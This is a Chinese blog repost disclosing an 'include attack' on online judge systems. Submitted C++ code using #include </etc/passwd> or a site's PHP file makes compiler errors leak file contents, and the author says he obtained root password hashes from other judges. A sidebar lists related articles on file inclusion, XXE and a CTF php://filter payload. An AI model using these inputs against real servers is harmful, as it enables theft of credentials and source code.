include 攻击

最新推荐文章于 2024-10-12 17:29:28 发布

TTOP

最新推荐文章于 2024-10-12 17:29:28 发布

阅读量1.4k

点赞数

分类专栏： OJ管理

OJ管理专栏收录该内容

10 篇文章 0 订阅

订阅专栏

我们来讲故事……

首先你要知道任何一个Online Judge在评测的时候，肯定是先编译再运行。

然后我们知道程序是不能随便打开文件的。

但是！请注意这个很大的“但是”。编译环节是肯定要打开文件的。比如：

#include <iostream>

int main()

{

return 0;

}

那么一定要打开iostream文件把文件内容全部贴进来。

这个时候机会来了：

#include </etc/passwd>

int main()

{

return 0;

}

废话，当然会CE。但是CE的时候编译器会显示错误部分的源代码的对不对？

如果测评时编译环节以root身份运行，就可以套出root密码的hash值。

#include </var/www/JudgeOnline/index.php>

int main()

{

return 0;

}

就可以套出网页源代码的前几个字节。（当然这个没多大用啦……因为php代码很难被看成C++代码，然后套出来的差不多是"<?php"这样的 = =……）

其实是大约几个星期以前我在写 UOJ的测评的时候发现的这个漏洞。然后试了试其它OJ……有些知名OJ居然直接就中招了……= =……有两个OJ我直接就拿到了root密码的哈希值……

所以我赶紧修补UOJ上的这个漏洞……我的方法是直接把编译器整个监控起来。

唔……我不知道还有多少小OJ存在这个问题？

现在公布出来，写OJ的同仁们发现自己的OJ有这个漏洞的就赶快修补吧 = =……

最后想问一个问题，学黑客技术哪家强？

原文链接：http://user.qzone.qq.com/497446970/2

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

TTOP

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

文件包含攻击

web13985085406的博客

05-16

575

文件包含：将本地可复用的文件利用包含函数在当前页面中执行。（将文件以脚本执行）如果某个页码具有这种功能，并且在这个包含的过程中，被包含的函数名可通过参数的方式被用户端控制，那么就可能存在文件包含漏洞。文件包含漏洞指当PHP函数引入文件时，没有合理校验传入的文件名，从而操作了预想之外的文件，导致以外的文件泄露甚至恶意的代码注入。在PHP环境下，可利用include、require、include_once、require_once函数调用文件，实现文件包含的效果。漏洞原理其原理就职注入一段用户能控制

hack OJ

zgw071415的专栏

04-01

1634

闲来无事(还有一大堆deadline好吗)hack了一下某OJ，不像大牛的include攻击那样可以拿到root password，这个只能hack出输入或者实现0ms AC。原理原理大家应该很容易猜到，就是通过评测结果传出信息。一般来说，OJ会给出程序的运行结果如WA、TLE、RE、MLE(如果会做的话包括AC)等等，不少OJ还会给出运行时间，只要在运行时控制这些评测结果，就可以用来传

参与评论您还未登录，请先登录后发表或查看评论

php远程文件包含攻击,php远程文件包含漏洞

weixin_29602351的博客

03-10

656

Author:Zizzy两年前的文章了，估计适合对php包含漏洞一知半解的2004-3-7在这篇文章里我会告诉php远程文件包含漏洞的原理，初涉程序员的人必看。首先的问题是，什么才是”远程文件包含漏洞“？简要的回答是服务器通过php的任意文件包含过滤不严，从而去执行一个恶意文件，这是个程序员过滤上的问题，请记住，所有的cgi程序都有这样的bug。1.找出bug：为了发现目标，我们首先要知道包含两个...

网络安全之XXE攻击

最新发布

anquan2233的博客

10-12

1443

个人认为，XXE 可以归结为一句话：构造恶意 DTD介绍 XXE 之前，我先来说一下普通的 XML 注入，这个的利用面比较狭窄，如果有的话应该也是逻辑漏洞。既然能插入 XML 代码，那我们肯定不能善罢甘休，我们需要更多，于是出现了 XXE。XML 外部实体注入，全称为 XML external entity injection，某些应用程序允许 XML 格式的数据输入和解析，可以通过引入外部实体的方式进行攻击。我们之前在0x01<creds><user>&xxe;

php漏洞攻击,PHP常见漏洞被攻击原因分析

weixin_33828635的博客

03-18

550

下面是一个很明显的例子：<In main.php:程序代码以下为引用的内容：＜?php$libDir = "/libdir";$langDir = "$libdir/languages";...include("$libdir/loadlanguage.php":?＞In libdir/loadlanguage.php:＜?php...include("$langDir/$userLang"...

hrbustOJ 受到攻击(判断点是否在凸多边形内包括边界)

weixin_30895603的博客

04-22

View Code /* * 题目要求：判断点是否在凸多边形内 * 方法：利用叉乘判断拐向来求解 * auther:Try86 */ #include <cstdio> #include <cstdlib> #include <iostream> using namespace std; const int N =...

PHP include任意文件或URL介绍

10-26

但使用这项功能时需要谨慎，因为远程文件包含（RFI）可能存在安全风险，例如可能遭受远程文件包含漏洞攻击，导致服务器被远程控制。因此，在使用allow_url_include功能时，必须确保使用的URL是安全可信的，或者采取...

require(),include(),require_once()和include_once()的异同

12-17

- 在使用URL包含远程文件时，确保远程服务器支持PHP解析，并且安全地传递参数，防止注入攻击。 - 考虑到性能，如果文件包含是条件性的或者可能在循环中，推荐使用 `include()`，因为 `require()` 总是立即执行，可能...

php include和require的区别深入解析

10-27

例如，如果一个文件名来自用户输入，攻击者可能会通过输入一个恶意构造的文件名来包含并执行任意代码，造成安全漏洞。因此，在包含文件时使用动态路径应该非常谨慎，并尽量避免使用用户输入的值。总而言之，...

在Django中预防CSRF攻击的操作

09-17

在Django框架中，预防CSRF（跨站请求伪造）攻击是确保Web应用安全性的重要环节。CSRF攻击是一种恶意利用用户已登录的身份进行非法操作的网络攻击方式，它通过伪装成用户来执行非用户意愿的操作，例如修改用户资料、...

远程文件包含

Just for fun

10-20

2400

远程文件包含（Remote File Inclusion），简称RFI，与其对应的是本地文件包含（Local File Inclusion，LFI），它们都是通过PHP的包含函数即：require(),require_once(),include()和include_once()来使用。一般情况下，用户通过包含函数将具有特定功能的函数或类包含到当前脚本中，是没有什么问题的。但是有时候，为...

C语言避免oj查重,杭电oj 1002题，我vc好几次都对，老是WA，求指导!代码如下:

weixin_36268722的博客

05-19

1304

杭电oj1002题，我vc好几次都对，老是WA，求指导!代码如下:0hxehsh2014.04.10浏览66次分享举报#includeusing namespace std;#include#includeint main(){int i,j,T,k;char a[1002],b[1002];//大整数转换为字符串处理char *pa=a;char *pb=b;char *p;cin>&g...

[ACTF2020 新生赛]Include

m0_62092622的博客

04-22

3105

打开有个链接tips，再点进去发现一句话 Can you find out the flag? 而且后面传入一个参数是file=flag.php http://39f0e8ed-769a-4b4b-84d3-52367874da03.node4.buuoj.cn:81/?file=flag.php 而且题目名字是include，所以这肯定是一个文件包含漏洞的题接下来我们学习一下伪协议 php:// 访问各个输入/输出流（I/O streams），在CTF中经常使用的是php://filt

XXE外部实体注入漏洞总结

www_xuhss_com的博客

02-20

4260

Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 XXE 漏洞原理 XXE是xml外部实体注入漏洞，应用程序解析xml输入时，没有禁止外部实体的加载，导致可加载恶意外部文件和代码，造成任意文件读取，命令执行，内网端口扫描攻击内网网站等危害。漏洞危害 1. 读取敏感文件。 2. 执行ssrf漏洞，进行内网端口探测，攻击内网网站

深入理解/etc/passwd和/etc/shadow

redwand的博客

01-09

2480

一、文件格式二、问题与思考

#include 两种方式的区别

jjz2016的博客

03-07

930

1.使用#include <>包含头文件时，系统会到默认目录（编译器和环境变量等所定义的头文件目录）查找要包含的文件，这是标准方式；2.使用#include ""包含头文件时，系统会先到用户当前目录（即项目目录）中查找要包含的文件，查找不到再按标准方式查找；...

CTF学习笔记——Include&Ping Ping Ping

Obs_cure的博客

09-20

1630

一、[ACTF2020 新生赛]Include 1.题目 2.解题步骤点进去看了一下根据题目猜测，应该是和php的文件包含漏洞有关…尝试了一下显示phpinfo，意料之中的失败了，看wp才了解到，这是一道伪协议的题目。然后翻了一下之前的博客，复制一下payload，成功解题。 ?file=php://filter/convert.base64-encode/resource=flag.php 3.总结第二次做伪协议的题，只能说经验不足，辨识出来，下次遇见类似这种访问文件的题目时可以尝试。

ctf include

08-06

根据引用内容，"ctf include"可能指的是CTF比赛中与文件包含漏洞相关的问题。在CTF比赛中，文件包含漏洞是一种常见的安全漏洞，攻击者可以通过利用该漏洞来读取或执行本不应该被访问的文件。根据引用中的描述，这道...